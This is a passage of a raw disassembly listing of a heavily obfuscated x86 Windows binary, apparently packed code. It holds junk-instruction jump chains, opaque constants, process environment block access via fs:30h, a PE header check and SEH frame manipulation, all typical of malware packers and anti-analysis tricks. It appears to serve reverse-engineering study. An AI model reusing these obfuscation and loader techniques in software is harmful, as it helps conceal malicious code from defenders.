mov [ebp-20h], eax
loc_43051F: ; CODE XREF: sub_42E9C6+8�j
; sub_43285C:loc_431748�j ...
mov eax, [ebp-20h]
sub eax, [ebp-28h]
jmp loc_42E81B
sub_43050F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43052A proc near ; CODE XREF: j8.b78ws:00430638�p
mov [esp+0], eax
rol eax, 0Ch
mov ds:dword_4312C8, eax
retn
sub_43052A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_430537: ; CODE XREF: sub_43119E:loc_431305�j
call sub_431E76
loc_43053C: ; CODE XREF: sub_43058C+1461�j
jmp loc_430C71
; ---------------------------------------------------------------------------
loc_430541: ; CODE XREF: sub_43119E-E91�j
jnz loc_4325F1
mov eax, [ebp-4]
mov [ebp-0Ch], eax
shl dword ptr [ebp-8], 8
jmp loc_430971
; ---------------------------------------------------------------------------
loc_430556: ; CODE XREF: sub_43119E:loc_430301�j
mov eax, [ebp-0Ch]
cmp byte ptr [eax], 0
jnz loc_4325F1
jmp loc_43170C
; END OF FUNCTION CHUNK FOR sub_43119E
; =============== S U B R O U T I N E =======================================
sub_430567 proc near ; CODE XREF: sub_43094F+13�j
push ebx
xchg edi, edx
sub_430567 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4313A8
loc_43056A: ; CODE XREF: sub_4313A8:loc_432147�j
add edi, 9BD2B561h
xchg edi, [esp+8+var_8]
jmp loc_4312BC
; END OF FUNCTION CHUNK FOR sub_4313A8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_96. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_430579: ; CODE XREF: j8.b78ws:004326AB�j
jmp locret_42EC49
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430EAC
loc_43057E: ; CODE XREF: sub_430EAC+15�j
or eax, eax
jnz loc_43099D
jmp loc_431E21
; END OF FUNCTION CHUNK FOR sub_430EAC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_33. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_43058C proc near ; CODE XREF: j8.b78ws:00431B88�j
; sub_42E934:loc_43202C�p
; FUNCTION CHUNK AT 0042E801 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042F905 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004319DE SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00431F3C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00432015 SIZE 0000000B BYTES
xchg edx, [esp+0]
pop edx
jz loc_4302CA
call nullsub_2
loc_43059B: ; CODE XREF: sub_42E14A:loc_43029A�j
; sub_43145D-11B6�j
jb loc_4319F2
xor eax, eax
jmp loc_42E801
sub_43058C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E9AD
loc_4305A8: ; CODE XREF: sub_42E9AD+17EB�j
shl ebx, 16h
ror ebp, 4
or eax, 0CD3C1301h
loc_4305B4: ; CODE XREF: sub_42E9AD:loc_430D32�j
push 46413A47h
and eax, 193A00C0h
jmp loc_42EB85
; END OF FUNCTION CHUNK FOR sub_42E9AD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FC8B
loc_4305C4: ; CODE XREF: sub_42FC8B+8�j
; j8.b78ws:00430690�j
mov edx, [esp+0]
mov al, 1
call edx
xor eax, eax
retn
; END OF FUNCTION CHUNK FOR sub_42FC8B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E699
loc_4305CE: ; CODE XREF: sub_42E699+3A33�j
jmp loc_4302E9
; END OF FUNCTION CHUNK FOR sub_42E699
; =============== S U B R O U T I N E =======================================
sub_4305D3 proc near ; CODE XREF: j8.b78ws:0042E221�p
call sub_42FC8B
call sub_42F992
loc_4305DD: ; CODE XREF: sub_42ED88+23D4�j
jmp nullsub_18
sub_4305D3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E2FE
loc_4305E2: ; CODE XREF: sub_42E2FE+E�j
jmp loc_431BC4
; END OF FUNCTION CHUNK FOR sub_42E2FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_4305E7: ; CODE XREF: sub_43119E+C3�j
mov eax, ds:dword_43007C
or eax, eax
jnz loc_431FC9
jmp loc_4310B2
; END OF FUNCTION CHUNK FOR sub_43119E
; =============== S U B R O U T I N E =======================================
sub_4305FA proc near ; DATA XREF: sub_4308AB+16A�o
div dword ptr [ebp-8]
push offset loc_431851
jmp nullsub_66
sub_4305FA endp
; ---------------------------------------------------------------------------
push eax
rol eax, 7
push ebx
push 0E022FC38h
pop ebx
add ebx, 20200448h
jmp loc_43260E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430EAC
loc_43061D: ; CODE XREF: sub_430EAC:loc_431112�j
mov eax, [ecx]
sbb ebp, edx
shr edi, 8
jmp loc_432036
; END OF FUNCTION CHUNK FOR sub_430EAC
; ---------------------------------------------------------------------------
loc_430629: ; DATA XREF: sub_43119E:loc_430382�o
call sub_432300
mov edx, 0F2B89A19h
call sub_432702
call sub_43052A
loc_43063D: ; CODE XREF: j8.b78ws:00431FDE�j
jl loc_431647
xchg ecx, edx
jmp sub_43217F
; ---------------------------------------------------------------------------
loc_43064A: ; DATA XREF: sub_42E64C+C�o
mov [edi], eax
pop edi
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430B6F
loc_43064E: ; CODE XREF: sub_430B6F+7�j
jmp loc_431AF3
; END OF FUNCTION CHUNK FOR sub_430B6F
; ---------------------------------------------------------------------------
loc_430653: ; CODE XREF: j8.b78ws:0043066E�j
jmp loc_42FA3A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E14A
loc_430658: ; CODE XREF: sub_42E14A:loc_432337�j
ror eax, 9
push eax
retn
; END OF FUNCTION CHUNK FOR sub_42E14A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E796
loc_43065D: ; CODE XREF: sub_42E796+13�j
jmp loc_42E57C
; END OF FUNCTION CHUNK FOR sub_42E796
; =============== S U B R O U T I N E =======================================
sub_430662 proc near ; CODE XREF: sub_431EA7+A�j
var_8 = dword ptr -8
; FUNCTION CHUNK AT 004304E6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431072 SIZE 0000000E BYTES
push ebp
jmp loc_4304E6
sub_430662 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_430668: ; CODE XREF: j8.b78ws:loc_431C46�j
test ecx, 100000h
jmp loc_430653
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EA96
loc_430673: ; CODE XREF: sub_42EA96:loc_42EC4A�j
jz loc_43041B
jmp loc_431A57
; END OF FUNCTION CHUNK FOR sub_42EA96
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_43067E: ; CODE XREF: sub_43119E-17E6�j
shr edx, 5
jmp loc_43037A
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
loc_430686: ; DATA XREF: sub_42E670+C�o
add eax, 5CBE37D6h
mov eax, [eax]
or eax, eax
jnz loc_4305C4
push ebp
jmp loc_4300DD
; ---------------------------------------------------------------------------
add ebp, 68707D2h
push ecx
jmp sub_43131C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C91
loc_4306A8: ; CODE XREF: sub_430C91:loc_431C41�j
add eax, [esp-4+arg_0]
adc edx, [esp+4]
add esp, 8
mov [ebp-4], eax
mov eax, [ebp-4]
cmp dword ptr [eax], 4550h
jnz loc_430D84
jmp loc_42FF3C
; END OF FUNCTION CHUNK FOR sub_430C91
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4306C9 proc near ; CODE XREF: sub_43230A�j
; DATA XREF: sub_432300�o
var_126 = byte ptr -126h
var_125 = byte ptr -125h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_14 = byte ptr -14h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042E723 SIZE 0000002C BYTES
; FUNCTION CHUNK AT 0042F7DF SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042FC73 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00431326 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004315C1 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004318FD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00431A62 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431BEB SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00432747 SIZE 00000005 BYTES
push ebp
mov ebp, esp
jo sub_431908
add esp, 0FFFFFFECh
jmp loc_42E723
sub_4306C9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E1B3
loc_4306DA: ; CODE XREF: sub_42E1B3:loc_42F7B7�j
pop eax
add eax, 292BC9CFh
and eax, 7E2B3DFCh
add eax, 0C241FE14h
mov eax, [eax]
or eax, eax
jnz loc_430A6C
call sub_432300
jmp loc_430D90
; END OF FUNCTION CHUNK FOR sub_42E1B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43237F
loc_430701: ; CODE XREF: sub_43237F:loc_431E71�j
call sub_431AB0
; END OF FUNCTION CHUNK FOR sub_43237F
; START OF FUNCTION CHUNK FOR sub_4314D8
loc_430706: ; CODE XREF: sub_4314D8+A�j
jmp loc_4323F3
; END OF FUNCTION CHUNK FOR sub_4314D8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FC8B
loc_43070B: ; CODE XREF: sub_42FC8B+E�j
; sub_43119E:loc_430BAF�j
jz loc_42F90E
jmp loc_4319F9
; END OF FUNCTION CHUNK FOR sub_42FC8B
; =============== S U B R O U T I N E =======================================
sub_430716 proc near ; CODE XREF: j8.b78ws:0042ED1C�j
; j8.b78ws:0042F7B2�p
; FUNCTION CHUNK AT 0042E593 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430A60 SIZE 00000002 BYTES
xchg esi, [esp+0]
pop esi
push edx
push 8EF1190h
pop edx
and edx, 3D8D051h
loc_430727: ; CODE XREF: j8.b78ws:0042ED46�j
add edx, 0FF7B0298h
mov [edx], eax
jmp loc_42E593
sub_430716 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_430734 proc near ; CODE XREF: sub_430A75:loc_42FAFF�p
; FUNCTION CHUNK AT 0042E7C8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004303BA SIZE 00000018 BYTES
mov [esp+0], eax
call sub_42E1FD
jmp loc_42E7C8
sub_430734 endp
; ---------------------------------------------------------------------------
call sub_43044A
; START OF FUNCTION CHUNK FOR sub_431BAC
loc_430746: ; CODE XREF: sub_431BAC+13�j
jmp loc_431B9A
; END OF FUNCTION CHUNK FOR sub_431BAC
; ---------------------------------------------------------------------------
xor ebp, ecx
jmp sub_430A75
; ---------------------------------------------------------------------------
loc_430752: ; CODE XREF: j8.b78ws:00430E34�j
sub eax, esi
; =============== S U B R O U T I N E =======================================
sub_430754 proc near ; CODE XREF: j8.b78ws:0042E197�p
; FUNCTION CHUNK AT 004318A9 SIZE 0000000A BYTES
xchg eax, [esp+0]
pop eax
mov edx, 0F75CA70h
call sub_432702
push eax
rol eax, 1Ch
jmp loc_4318A9
sub_430754 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBA9
loc_43076B: ; CODE XREF: sub_42EBA9+3BCC�j
and eax, edi
; END OF FUNCTION CHUNK FOR sub_42EBA9
; START OF FUNCTION CHUNK FOR sub_42FED3
loc_43076D: ; CODE XREF: sub_42FED3:loc_43270A�j
mov [ebp-18h], eax
mov dword ptr [ebp-0Ch], 1
; END OF FUNCTION CHUNK FOR sub_42FED3
; START OF FUNCTION CHUNK FOR sub_42FB98
loc_430777: ; CODE XREF: sub_42FB98+7�j
; sub_4321C5-149E�j
lea eax, [ebp-14h]
push eax
call sub_430CE7
loc_430780: ; CODE XREF: sub_430A75+18�j
jmp loc_431763
; END OF FUNCTION CHUNK FOR sub_42FB98
; ---------------------------------------------------------------------------
cmp edx, 3B7C038Dh
jmp loc_431E85
; =============== S U B R O U T I N E =======================================
sub_430790 proc near ; CODE XREF: j8.b78ws:0042E7CE�j
; sub_42E825:loc_42FA13�p
; FUNCTION CHUNK AT 0042FF0D SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00430CAA SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00430E4F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00432162 SIZE 0000001D BYTES
xchg esi, [esp+0]
pop esi
mov [ebp-4], eax
mov eax, [ebp-4]
jmp loc_430E4F
sub_430790 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301B9
loc_43079F: ; CODE XREF: sub_4301B9+EEE�j
jnz loc_430F55
mov eax, [ebp+8]
or dword ptr [eax-8], 4
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
mov edx, [ebp+8]
mov [edx-18h], eax
jmp loc_42EEFC
; END OF FUNCTION CHUNK FOR sub_4301B9
; ---------------------------------------------------------------------------
mov eax, edi
jmp sub_42EC7D
; ---------------------------------------------------------------------------
locret_4307C4: ; CODE XREF: j8.b78ws:0042FE01�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4325CC
loc_4307C5: ; CODE XREF: sub_4325CC:loc_42E070�j
push ecx
push offset sub_42E1B3
jmp nullsub_90
; END OF FUNCTION CHUNK FOR sub_4325CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_4307D0: ; CODE XREF: sub_43119E+D�j
; j8.b78ws:loc_431DB3�j
call sub_432300
push 0F84A1336h
pop edx
add edx, 0B9F8A100h
jmp loc_430019
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
pushf
jmp sub_43137D
; =============== S U B R O U T I N E =======================================
sub_4307EC proc near ; CODE XREF: j8.b78ws:004301F5�j
; j8.b78ws:00431AD1�p
mov [esp+0], ebx
pop ebx
mov edx, [ebx+ecx]
xor edx, [ebx+ecx+4]
jmp loc_43101A
sub_4307EC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4307FC proc near ; CODE XREF: sub_431DF1+C�p
; FUNCTION CHUNK AT 0042F945 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042FCBA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FE33 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00430245 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00431026 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00431CA2 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00431F9A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00432824 SIZE 0000001F BYTES
push ebx
push ecx
mov eax, large fs:30h
mov eax, [eax+0Ch]
jmp loc_42FCBA
sub_4307FC endp
; =============== S U B R O U T I N E =======================================
sub_43080D proc near ; DATA XREF: sub_4317D9+5�o
sub eax, 0A3F4EE00h
add eax, 255557Ah
push offset sub_430F88
loc_43081E: ; CODE XREF: j8.b78ws:0042EC8A�j
jmp nullsub_35
sub_43080D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E2A1
loc_430823: ; CODE XREF: sub_42E2A1+16DA�j
mov ds:dword_42E058, eax
jmp loc_42E0FA
; END OF FUNCTION CHUNK FOR sub_42E2A1
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43082D proc near ; CODE XREF: sub_42E2A1�j
; FUNCTION CHUNK AT 0042E43A SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0042ED12 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430BD2 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00431662 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004322EE SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004324FB SIZE 00000005 BYTES
push ebp
mov ebp, esp
push ecx
cmp ds:dword_42E058, 0
jz loc_42E43A
loc_43083E: ; CODE XREF: sub_43058C:loc_432015�j
push offset loc_43221D
jmp j_nullsub_21
sub_43082D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_430848 proc near ; DATA XREF: sub_4301B9:loc_432071�o
mov eax, [eax+20h]
add eax, [ebp-4]
push offset loc_42EAAC
loc_430853: ; CODE XREF: j8.b78ws:0042FD93�j
jmp j_nullsub_51
sub_430848 endp
; ---------------------------------------------------------------------------
rol ebx, 9
jmp sub_431651
; ---------------------------------------------------------------------------
loc_430860: ; DATA XREF: sub_42FAE7+22DF�o
push 14588CBFh
xchg ecx, [esp]
mov edx, ecx
pop ecx
add edx, 50971D2Eh
push esi
mov [esp], ebx
pushf
jmp loc_42E3B7
; ---------------------------------------------------------------------------
cmp edx, ebp
jmp loc_431723
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430148
loc_430882: ; CODE XREF: sub_430148+C�j
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
push eax
mov eax, [ebp+arg_0]
test byte ptr [eax-8], 8
setnz al
call sub_430E65
jmp loc_42EEB0
; END OF FUNCTION CHUNK FOR sub_430148
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_43089D: ; CODE XREF: sub_43119E+67F�j
mov ebx, [eax]
popf
test esi, 52B0422Fh
jmp loc_432592
; END OF FUNCTION CHUNK FOR sub_43119E
; =============== S U B R O U T I N E =======================================
sub_4308AB proc near ; CODE XREF: sub_42FFCD+1644�j
; sub_42EECE+392E�p
; FUNCTION CHUNK AT 0042E4C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043005F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004304FC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00430A0B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00431854 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00431860 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00431884 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00431BD3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431D14 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004323BD SIZE 00000012 BYTES
mov [esp+0], esi
pop esi
add edx, edi
rol edx, 5
xor edx, ebp
rol edx, 5
add edx, esp
rol edx, 5
jmp loc_431BD3
sub_4308AB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4308C3 proc near ; CODE XREF: sub_43237A�j
var_4 = dword ptr -4
push ebx
push 5289C501h
pop ebx
add ebx, 0AD763B27h
xchg ebx, [esp+4+var_4]
mov eax, [ebp-4]
push eax
call sub_430D5F
jmp loc_42E893
sub_4308C3 endp
; ---------------------------------------------------------------------------
jns loc_42F787
sub ecx, 74E7C232h
jmp sub_43038C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_22. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4308F3: ; DATA XREF: sub_42FF6E-3E0�o
add esi, 934384F9h
mov [esi], eax
pop esi
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FFCD
loc_4308FD: ; CODE XREF: sub_42FFCD:loc_42E785�j
sbb ebp, ebx
push ebx
jmp loc_430CD7
; END OF FUNCTION CHUNK FOR sub_42FFCD
; =============== S U B R O U T I N E =======================================
sub_430905 proc near ; CODE XREF: sub_42ED88:loc_42ED99�p
; sub_431804+E�j
xchg esi, [esp+0]
pop esi
pop ecx
pop ecx
call sub_42E00E
locret_430910: ; CODE XREF: sub_42FF6E-3DB�j
retn
sub_430905 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C2C
loc_430911: ; CODE XREF: sub_430C2C+18�j
jmp loc_42FEE9
; END OF FUNCTION CHUNK FOR sub_430C2C
; ---------------------------------------------------------------------------
push 274BDDCBh
jmp loc_43033D
; ---------------------------------------------------------------------------
test edi, 94CBCEEDh
jmp loc_432794
; ---------------------------------------------------------------------------
mov [edx], ecx
jmp sub_42E12B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E9AD
loc_430932: ; CODE XREF: sub_42E9AD+11�j
test eax, eax
jz loc_430D84
jmp loc_430D32
; END OF FUNCTION CHUNK FOR sub_42E9AD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FBE2
loc_43093F: ; CODE XREF: sub_42FBE2:loc_42E4F6�j
xor eax, eax
retn
; END OF FUNCTION CHUNK FOR sub_42FBE2
; =============== S U B R O U T I N E =======================================
sub_430942 proc near ; DATA XREF: sub_42FBE2-1777�o
xor eax, eax
sub_430942 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42EA18
loc_430944: ; CODE XREF: sub_42EA18:loc_4304F0�j
pop large dword ptr fs:0
add esp, 4
retn
; END OF FUNCTION CHUNK FOR sub_42EA18
; =============== S U B R O U T I N E =======================================
sub_43094F proc near ; CODE XREF: sub_42FBE2�p
; FUNCTION CHUNK AT 0042E610 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FF89 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00431A16 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00431BCE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004323CF SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00432647 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004326C1 SIZE 00000005 BYTES
push large dword ptr fs:0
jmp loc_430998
; ---------------------------------------------------------------------------
loc_43095B: ; CODE XREF: j8.b78ws:0043215D�j
jnb loc_42EB60
popf
jmp sub_430567
; ---------------------------------------------------------------------------
loc_430967: ; CODE XREF: sub_43119E:loc_43170C�j
mov eax, [ebp-4]
mov [ebp-0Ch], eax
shl dword ptr [ebp-8], 8
loc_430971: ; CODE XREF: sub_4325E9:loc_42E2E1�j
; sub_43119E-C4D�j
jb loc_42FF97
mov eax, [ebp-0Ch]
cmp byte ptr [eax], 0
jnz loc_431288
mov eax, [ebp-8]
jmp loc_431BCE
; ---------------------------------------------------------------------------
loc_43098B: ; CODE XREF: sub_430EAC+119E�j
mov [esp+0], eax
rol eax, 5
mov ds:dword_431C4C, eax
retn
; ---------------------------------------------------------------------------
loc_430998: ; CODE XREF: sub_43094F+7�j
jmp loc_431A16
sub_43094F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430EAC
loc_43099D: ; CODE XREF: sub_430EAC-92C�j
ror eax, 5
jmp loc_430A48
; END OF FUNCTION CHUNK FOR sub_430EAC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_4309A5: ; CODE XREF: sub_43119E:loc_431773�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4320AE
loc_4309A7: ; CODE XREF: sub_4320AE+E�j
jmp loc_42FA91
; END OF FUNCTION CHUNK FOR sub_4320AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4316AB
loc_4309AC: ; CODE XREF: sub_4316AB:loc_4316B4�j
jmp loc_431E51
; END OF FUNCTION CHUNK FOR sub_4316AB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4320D1
loc_4309B1: ; CODE XREF: sub_4320D1+12�j
cmp dword ptr [ebp-10h], 1
jnz loc_430B97
jmp loc_430440
; END OF FUNCTION CHUNK FOR sub_4320D1
; ---------------------------------------------------------------------------
popf
sub ebp, 0A40EFD42h
jmp sub_430D9F
; ---------------------------------------------------------------------------
loc_4309CC: ; DATA XREF: sub_42E9AD+1F0�o
mov [ebp-8], eax
push 400h
mov eax, [ebp-8]
call sub_42E2FE
; START OF FUNCTION CHUNK FOR sub_430EAC
loc_4309DC: ; CODE XREF: sub_430EAC:loc_431E21�j
jz loc_432036
loc_4309E2: ; CODE XREF: j8.b78ws:0042FD9E�j
jmp loc_431112
; END OF FUNCTION CHUNK FOR sub_430EAC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_30. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4327E5
loc_4309E8: ; CODE XREF: sub_4327E5+D�j
jmp loc_42EDF2
; END OF FUNCTION CHUNK FOR sub_4327E5
; ---------------------------------------------------------------------------
loc_4309ED: ; CODE XREF: j8.b78ws:004301FD�j
and ebx, 3806DE32h
; =============== S U B R O U T I N E =======================================
sub_4309F3 proc near ; CODE XREF: sub_42E14A+20�p
; FUNCTION CHUNK AT 0042ED21 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00431535 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00432235 SIZE 0000000A BYTES
mov [esp+0], eax
pop eax
mov eax, [ebp-4]
cmp byte ptr [eax], 0CFh
jz loc_42FBD3
mov eax, [ebp-4]
jmp loc_431535
sub_4309F3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4308AB
loc_430A0B: ; CODE XREF: sub_4308AB:loc_42E4C9�j
add eax, 7F55F913h
mov eax, [eax]
xor edx, edx
push offset sub_4305FA
loc_430A1A: ; CODE XREF: j8.b78ws:loc_430C26�j
jmp nullsub_67
; END OF FUNCTION CHUNK FOR sub_4308AB
; =============== S U B R O U T I N E =======================================
sub_430A1F proc near ; CODE XREF: sub_430059:loc_43005A�p
; j8.b78ws:0043268D�j
arg_10 = dword ptr 14h
; FUNCTION CHUNK AT 0042E0E8 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043159F SIZE 00000005 BYTES
mov [esp+0], edi
pop edi
call sub_42E755
call sub_42EB5A
add esp, 10h
xchg eax, [esp+0]
jmp loc_43159F
sub_430A1F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FED3
loc_430A38: ; CODE XREF: sub_42FED3-288�j
mov eax, [eax]
test eax, eax
jle loc_430D84
jmp loc_43270A
; END OF FUNCTION CHUNK FOR sub_42FED3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_20. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430EAC
loc_430A48: ; CODE XREF: sub_430EAC-50C�j
jmp loc_4324EF
; END OF FUNCTION CHUNK FOR sub_430EAC
; =============== S U B R O U T I N E =======================================
sub_430A4D proc near ; DATA XREF: sub_432702-676�o
add esp, 0FFFFFED8h
mov [ebp-8], edx
push offset loc_42E918
jmp sub_432209
sub_430A4D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430716
loc_430A60: ; CODE XREF: sub_430716:loc_42E593�j
pop edx
retn
; END OF FUNCTION CHUNK FOR sub_430716
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4322A3
loc_430A62: ; CODE XREF: sub_4322A3+16�j
jmp loc_431532
; END OF FUNCTION CHUNK FOR sub_4322A3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4313E5
loc_430A67: ; CODE XREF: sub_4313E5+16�j
jmp loc_4317EE
; END OF FUNCTION CHUNK FOR sub_4313E5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E1B3
loc_430A6C: ; CODE XREF: sub_42FFCD-12F7�j
; sub_42E1B3+253E�j
ror eax, 1Ch
push eax
jmp loc_42E74F
; END OF FUNCTION CHUNK FOR sub_42E1B3
; =============== S U B R O U T I N E =======================================
sub_430A75 proc near ; CODE XREF: sub_430CB3:loc_42E7C2�p
; j8.b78ws:0043074D�j
; FUNCTION CHUNK AT 0042FAFF SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00431013 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004316FA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043177E SIZE 00000008 BYTES
xchg ebx, [esp+0]
pop ebx
test al, al
jz loc_43177E
loc_430A81: ; CODE XREF: j8.b78ws:0042FC62�j
push 0B33474F6h
pop eax
add eax, 0A9548704h
jmp loc_430780
sub_430A75 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301DE
loc_430A92: ; CODE XREF: sub_4301DE:loc_4324F1�j
jnz loc_42ED7B
push esi
push 68DB713Dh
pop esi
jmp loc_42EE9E
; END OF FUNCTION CHUNK FOR sub_4301DE
; ---------------------------------------------------------------------------
shr ebp, 14h
jmp sub_42E174
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4315E4
loc_430AAC: ; CODE XREF: sub_4315E4:loc_431038�j
movzx eax, byte ptr [eax]
mov [ebp-1Ch], eax
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
mov eax, ds:dword_42EF3C[eax*4]
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jmp loc_42E8CB
; END OF FUNCTION CHUNK FOR sub_4315E4
; ---------------------------------------------------------------------------
cmp edx, 0B7481E63h
jmp loc_430B08
; ---------------------------------------------------------------------------
mov esi, edi
jmp sub_42FF6E
; ---------------------------------------------------------------------------
not ebx
jmp sub_4320D1
; ---------------------------------------------------------------------------
loc_430AE4: ; DATA XREF: j8.b78ws:0042E703�o
call sub_42EC54
mov ds:dword_42F744, eax
